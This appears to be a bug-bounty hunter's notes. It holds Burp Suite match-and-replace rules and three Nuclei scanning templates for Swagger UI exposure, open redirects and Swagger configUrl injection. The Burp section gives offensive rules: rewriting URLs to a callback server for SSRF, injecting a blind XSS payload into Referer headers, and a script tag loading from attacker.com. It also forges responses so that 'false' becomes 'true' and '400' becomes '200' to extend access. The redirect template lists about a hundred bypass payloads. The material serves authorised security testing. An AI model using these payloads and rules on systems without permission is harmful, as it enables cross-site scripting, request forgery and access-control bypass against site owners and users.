My Nuclei templates

Burp BB Rules

Find SSRF rule that changes any URL in your incoming requests with your callback URL:
Type: Request Header
Match: https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Replace: https://{YOUR_SERVER}/
-----------------------------
Find Blind XSS rule auto-replace your Referer header:
Type: Request Header
Match: ^Referer.*$
Replace: Referer: {BLIND_XSS_PAYLOAD}
-----------------------------
Find hidden parameters/input fields:
Type: Request Header
Match: type\=(\"|')hidden(\"|')
Replace: type="text"
-----------------------------
Extend access with response manipulation
Type: Request response value
- "false" ➜ "true"
- "error" ➜ "success"
- "400" ➜ "200"
-----------------------------
Find Blind XSS in parameter value fields:
Type: Request parameter value
"><script src=https://attacker.com></script>

id: swagger-ui

info:
  name: Swagger UI
  author: vidocsecurity
  severity: low
  description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS
  tags: swagger-ui,exposure

requests:
  - method: "GET"
    path:
      - '{{BaseURL}}/'
      - '{{BaseURL}}/index.html'
      - '{{BaseURL}}/swagger-ui'
      - '{{BaseURL}}/api/'
      - '{{BaseURL}}/docs/'
      - '{{BaseURL}}/idm/v2/api-docs'
      - '{{BaseURL}}/docs/api-reference'
      - '{{BaseURL}}/swaggerui'
      - '{{BaseURL}}/api/help'
      - '{{BaseURL}}/doc'
      - '{{BaseURL}}/doc/'
      - '{{BaseURL}}/docu'
      - '{{BaseURL}}/docs'
      - '{{BaseURL}}/api-doc'
      - '{{BaseURL}}/api-docs/swagger.json'
      - '{{BaseURL}}/api-reference'
      - '{{BaseURL}}/swagger.json'
      - '{{BaseURL}}/swagger/docs/v1'
      - '{{BaseURL}}/reference'
      - '{{BaseURL}}/swagger-ui.html/swagger-ui.html'
      - '{{BaseURL}}/swagger/index.html'
      - '{{BaseURL}}/swagger-ui.html'
      - '{{BaseURL}}/swagger/v1/swagger.json'
      - '{{BaseURL}}/swagger/swagger-ui.html'
      - '{{BaseURL}}/api/swagger-ui.html'
      - '{{BaseURL}}/api-docs/swagger.yaml'
      - '{{BaseURL}}/api-docs/'
      - '{{BaseURL}}/api/swagger'
      - '{{BaseURL}}/api/index.html'
      - '{{BaseURL}}/api/doc'
      - '{{BaseURL}}/api/docs/'
      - '{{BaseURL}}/api/swagger/index.html'
      - '{{BaseURL}}/api/swagger/swagger-ui.html'
      - '{{BaseURL}}/api/swagger-ui/api-docs'
      - '{{BaseURL}}/swagger-ui.html'
      - '{{BaseURL}}/api/apidocs'
      - '{{BaseURL}}/api/swagger'
      - '{{BaseURL}}/webjars/swagger-ui/index.html'
      - '{{BaseURL}}/api/swagger/static/index.html'
      - '{{BaseURL}}/api/swagger-resources'
      - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs'
      - '{{BaseURL}}/api/__swagger__/'
      - '{{BaseURL}}/api/_swagger_/'
      - '{{BaseURL}}/api/spec'
      - '{{BaseURL}}/api/swagger/ui/index'
      - '{{BaseURL}}/swagger/v1/swagger.json'
      - '{{BaseURL}}/__swagger__/'
      - '{{BaseURL}}/api/v2/doc'
      - '{{BaseURL}}/api/v1/'
      - '{{BaseURL}}/api/v1/doc'
      - '{{BaseURL}}/_swagger_/'
      - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs'
      - '{{BaseURL}}/classicapi/doc/'
      - '{{BaseURL}}/api/v1/openapi'

    redirects: true
    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "swagger-ui"           # Swagger UI specific identifier
          - "swagger-initializer"  # Swagger UI common script
          - "api-docs"             # Often present in API docs
          - "swagger.json"         # Common in Swagger UI
          - "swagger:"
          - "Swagger 2.0"
          - "\"swagger\":"
          - "Swagger UI"
          - "loadSwaggerUI"
          - "**token**:"
          - "id=\"swagger-ui"
      - type: status
        condition: and
        status:
          - 200

id: open-redirect-generic

info:
  name: Open Redirect - Detection
  author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
  severity: medium
  description: An open redirect vulnerability was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 93
  tags: redirect,generic

http:
  - method: GET
    path:
      - "{{RootURL}}/{{redirect}}"

    payloads:
      redirect:
        - '%0a/oast.me/'
        - '%0d/oast.me/'
        - '%00/oast.me/'
        - '%09/oast.me/'
        - '%5C%5Coast.me/%252e%252e%252f'
        - '%5Coast.me'
        - '%5coast.me/%2f%2e%2e'
        - '%5c{{RootURL}}oast.me/%2f%2e%2e'
        - '//#//oast.me/'
        - '//oast.me/%2f%2e%2e'
        - '//oast.me/%2e%2e'
        - '//%09/oast.me'
        - '//%5coast.me'
        - '//oast.me/..;/css'
        - '//\http://oast.me'
        - '//%EF%B9%B0/https://oast.me'
        - '//;@oast.me'
        - '../oast.me'
        - '.oast.me'
        - '/%5coast.me'
        - '////\;@oast.me'
        - '////oast.me'
        - '///oast.me'
        - '///oast.me/%2f%2e%2e'
        - '///oast.me@//'
        - '///{{RootURL}}oast.me/%2f%2e%2e'
        - '//;@oast.me'
        - '//\/oast.me/'
        - '//\@oast.me'
        - '//\oast.me'
        - '//\oast.me/'
        - '//oast.me/%2F..'
        - '//oast.me//'
        - '//%6f%61%73%74%2e%6d%65'
        - '//oast.me@//'
        - '//oast.me\toast.me/'
        - '//https://oast.me//'
        - '/<>//oast.me'
        - '/\/\/oast.me/'
        - '/\/oast.me'
        - '/\oast.me'
        - '//@oast.me'
        - '///@oast.me'
        - '////@oast.me/'
        - '/oast.me'
        - '//oast.me'
        - '/oast.me/%2F..'
        - '/oast.me/'
        - '/oast.me/..;/css'
        - '/https:oast.me'
        - '/{{RootURL}}oast.me/'
        - '/〱oast.me'
        - '/〵oast.me'
        - '/ゝoast.me'
        - '/ーoast.me'
        - '/ｰoast.me'
        - '<>//oast.me'
        - '@oast.me'
        - '@https://oast.me'
        - '\/\/oast.me/'
        - 'oast%E3%80%82me'
        - 'oast.me'
        - 'oast.me/'
        - 'oast.me//'
        - 'oast.me;@'
        - 'https%3a%2f%2foast.me%2f'
        - 'https:%0a%0doast.me'
        - 'https://%0a%0doast.me'
        - 'https://%09/oast.me'
        - 'https://%2f%2f.oast.me/'
        - 'https://%3F.oast.me/'
        - 'https://%5c%5c.oast.me/'
        - 'https://%5coast.me@'
        - 'https://%23.oast.me/'
        - 'https://.oast.me'
        - 'https://////oast.me'
        - 'https:///oast.me'
        - 'https:///oast.me/%2e%2e'
        - 'https:///oast.me/%2f%2e%2e'
        - 'https:///oast.me@oast.me/%2e%2e'
        - 'https:///oast.me@oast.me/%2f%2e%2e'
        - 'https://:80#@oast.me/'
        - 'https://:80?@oast.me/'
        - 'https://:@\@oast.me'
        - 'https://:@oast.me\@oast.me'
        - 'https://;@oast.me'
        - 'https://\toast.me/'
        - 'https://oast.me/oast.me'
        - 'https://oast.me/https://oast.me/'
        - 'https://www.\.oast.me'
        - 'https:/\/\oast.me'
        - 'https:/\oast.me'
        - 'https:/oast.me'
        - 'https:oast.me'
        - '{{RootURL}}oast.me'
        - '〱oast.me'
        - '〵oast.me'
        - 'ゝoast.me'
        - 'ーoast.me'
        - 'ｰoast.me'
        - 'redirect/oast.me'
        - 'cgi-bin/redirect.cgi?oast.me'
        - 'out?oast.me'
        - 'login?to=http://oast.me'
        - '1/_https@oast.me'
        - 'redirect?targeturl=https://oast.me'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

      - type: status
        status:
          - 301
          - 302
          - 307
          - 308
        condition: or
# digest: 4a0a00473045022100b327ea17f154456b706a540e72c9c79e4c901a70091e38648ed261ecd5b0094502202f0ae209b845dc30c6fb92d9f33617dbca5720568776d2b1e8df2c17cb36202d:922c64590222798bb761d5b6d8e72950

id: swagger-ui-config-url-injection-Extensive

info:
  name: Swagger UI Config URL Injection
  author: Shadowbyte
  severity: low
  description: Detects if adding a configUrl parameter to Swagger UI endpoints leads to successful load (HTTP 200) and presence of Swagger UI content. Includes versioned paths.
  tags: swagger-ui,xss,injection

requests:
  - method: GET
    path:
      - '{{BaseURL}}/swagger-ui/index.html?url=https://jumpy-floor.surge.sh/test.yaml'
      - '{{BaseURL}}/api/swagger/?url=https://jumpy-floor.surge.sh/test.yaml'
      - '{{BaseURL}}/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json&url=https://jumpy-floor.surge.sh/test.yaml'
      - '{{BaseURL}}/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/webjars/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger-ui?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/docs/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/idm/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/docs/api-reference?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swaggerui?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/help?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/doc?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api-reference?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger/docs/v1?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/reference?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api-docs/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/docs/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger-ui/api-docs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/api-docs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/apidocs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger/static/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger-resources?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/__swagger__/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/_swagger_/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/spec?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/__swagger__/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/v2/doc?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/v1/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/v1/doc?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/_swagger_/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/classicapi/doc/?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/api/v1/openapi?configUrl=https://xss.smarpo.com/test.json'
      # Versioned paths
      - '{{BaseURL}}/v0.12/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.11/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.10/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.9/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.8/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.7/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.6/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.5/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.4/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.3/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.2/index.html?configUrl=https://xss.smarpo.com/test.json'
      - '{{BaseURL}}/v0.1/index.html?configUrl=https://xss.smarpo.com/test.json'

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "swagger-ui"           # Swagger UI specific identifier
          - "swagger-initializer"  # Swagger UI common script
          - "api-docs"             # Often present in API docs
          - "swagger.json"         # Common in Swagger UI
        condition: or

      - type: status
        status:
          - 200